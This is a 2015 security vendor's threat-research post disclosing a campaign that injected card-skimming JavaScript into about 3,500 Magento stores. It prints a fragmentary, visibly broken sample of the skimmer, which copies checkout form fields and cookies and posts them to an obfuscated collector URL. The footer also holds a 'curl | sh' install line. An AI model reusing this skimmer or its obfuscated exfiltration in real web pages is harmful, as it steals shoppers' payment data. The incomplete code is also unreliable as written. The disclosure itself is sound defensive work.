Sansec logo

Criminals have rewired 3,500 online stores


by Sansec Forensics Team

Published in Threat Research − November 17, 2015

Criminals have rewired 3,500 online stores

Criminals have secretly rewired 3,500 online stores to continuously harvest credit card numbers. The fraud can be traced back as far as May 12th 2015, so if you have bought something at one of these stores in the last 6 months, your credit card is likely compromised.

We received reports of suspicious Javascript code through MageReport and have ran a scan on all known shops globally. To our horror, we discovered thousands of credit card hijacking shops.

There are multiple versions found in the wild, but they work the same. The malware is embedded in the header or footer of every page. Once an unsuspecting shopper submits a form that contains anything resembling a credit card number, the whole form is transparently copied, using AJAX, to a remote location.

This is a sample found in the wild, which sends credit card data to

// whitespace added for readability --wdg
function j(e) {
  var t = "; " + document.cookie,
    o = t.split("; " + e + "=");
  return 2 == o.length ? o.pop().split(";").shift() : void 0;
j("SESSIID") || (document.cookie = "SESSIID=" + new Date().getTime());
jQuery(function (e) {
  e("button").on("click", function () {
    var t = "",
      o = "post",
      n = window.location;
    if (new RegExp("onepage|checkout").test(n)) {
      for (
        var c = document.querySelectorAll("input, select, textarea, checkbox"),
          i = 0;
        i < c.length;
        if (c[i].value.length > 0) {
          var a = c[i].name;
          "" == a && (a = i), (t += a + "=" + c[i].value + "&");
      if (t) {
        var l = new RegExp("[0-9]{13,16}"),
          u = new XMLHttpRequest();
              "&#104;&#116;&#116;&#112;&#58;&# 47; & #47;&# 111; & #119;&# 110; & #115;&# 97; & #102;&# 101; & #116;&# 121; & #46;&# 111; & #114;&# 103; & #47;&# 111; & #112;&# 112; & #46;&# 112; & #104;&# 112;"
            t +
              "&asd=" +
              (l.test(t.replace(/s/g, "")) ? 1 : 0) +
              "&utmp=" +
              n +
              "&cookie=" +

We have found other collector servers as well, in order of frequency:

      1 /js/index.php
      1 /js/am/extensions/sitemap_api.php

Revolutionary malware

First, the malware went unnoticed for more than 6 months. It runs in the browser and is stored in the database of the CMS. This makes it hard to discover on a server level. Server measures like a periodic git status or a read-only filesystem will not help.

Second, with this new attack, credit card numbers are captured as soon as an unsuspecting shopper types them in their browser. Until now, credit card thieves mainly targeted (transaction) servers, where payment data is generally encrypted and thus hard to extract. With this new attack, credit cards are captured before they can be encrypted.

And finally, the high number of compromised stores implies extensive automation in discovery and exploitation. This is not the work of script kiddies.


We urge merchants and developers to verify the safety of their shop.

Meanwhile, we have asked the Dutch Cyber Security Center to take the collector servers down. Fixing all the stores involved will take a little longer, but Google will hopefully block these shops in the browser shortly.

Background: going back in time

To determine the first occurrence of this attack, the historical archives at are a great resource. The University of Michigan provides bi-weekly snapshots for HTTP frontpages for every IPv4 on the planet, going back two years. With some computing power and time, we parsed all the archives until no more traces of the malware could be found (code here). So the first malware was implemented between April 28th and May 12th. It gives interesting insights in its lifecycle, as the malware started by posting to its own address. Later on, likely because more shops were involved, the code switched to central reporting.

Read more

Scan your store now
for malware & vulnerabilities

$ curl | sh

eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security

Terms & Conditions
Privacy & Cookie Policy
Company Reg 77165187
Tax NL860920306B01